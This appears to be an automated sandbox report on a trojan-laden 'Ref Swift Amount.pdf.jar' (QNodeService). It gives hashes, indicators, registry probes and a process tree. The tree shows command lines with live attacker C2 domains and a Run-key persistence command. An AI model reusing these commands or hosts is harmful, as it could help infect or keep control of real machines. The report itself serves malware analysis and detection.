Analysis
-
max time kernel
119s -
max time network
145s -
platform
windows10_x64 -
resource
win10 -
submitted
05-07-2020 07:18
Static task
static1
Behavioral task
behavioral1
Sample
Ref Swift Amount.pdf.jar
Resource
win7v200430
Behavioral task
behavioral2
Sample
Ref Swift Amount.pdf.jar
Resource
win10
General
-
Target
Ref Swift Amount.pdf.jar
-
Size
13KB
-
MD5
0116bbe99adfdb7f0e2c6e1fefe10642
-
SHA1
c8208c0da417f08fc5d60b426cb3e9c68de3bdc3
-
SHA256
a002f82ab804aa9976005619bc75c26345006c67a454b39fe0e404a14af7f705
-
SHA512
bccb6c0146f19fa26c5cf721c19c8a7e9f4925614f3528dea73c181c1f1ed0043c440d0b26a73779e3dd8e117bb01c6996fe2c0db69445fae379f41c485cff6b
Malware Config
Signatures
-
Loads dropped DLL 4 IoCs
pid Process 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3900 node.exe 3900 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Executes dropped EXE 2 IoCs
pid Process 3824 node.exe 3900 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfee-115.dat family_qnodeservice -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 wtfismyip.com 11 wtfismyip.com -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-1ed5dcf4 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-1ed5dcf4.cmd\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3576 wrote to memory of 3824 3576 java.exe 68 PID 3576 wrote to memory of 3824 3576 java.exe 68 PID 3824 wrote to memory of 1100 3824 node.exe 69 PID 3824 wrote to memory of 1100 3824 node.exe 69 PID 1100 wrote to memory of 1264 1100 cmd.exe 70 PID 1100 wrote to memory of 1264 1100 cmd.exe 70 PID 3824 wrote to memory of 3900 3824 node.exe 71 PID 3824 wrote to memory of 3900 3824 node.exe 71
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Ref Swift Amount.pdf.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://mparrain10.ddns.net --central-base-url https://dabadaba.theworkpc.com --central-base-url https://mparrain10.duckdns.org2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1ed5dcf4" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1ed5dcf4.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1ed5dcf4" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1ed5dcf4.cmd\""4⤵
- Adds Run entry to start application
PID:1264
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://mparrain10.ddns.net --central-base-url https://dabadaba.theworkpc.com --central-base-url https://mparrain10.duckdns.org3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Executes dropped EXE
PID:3900
-
-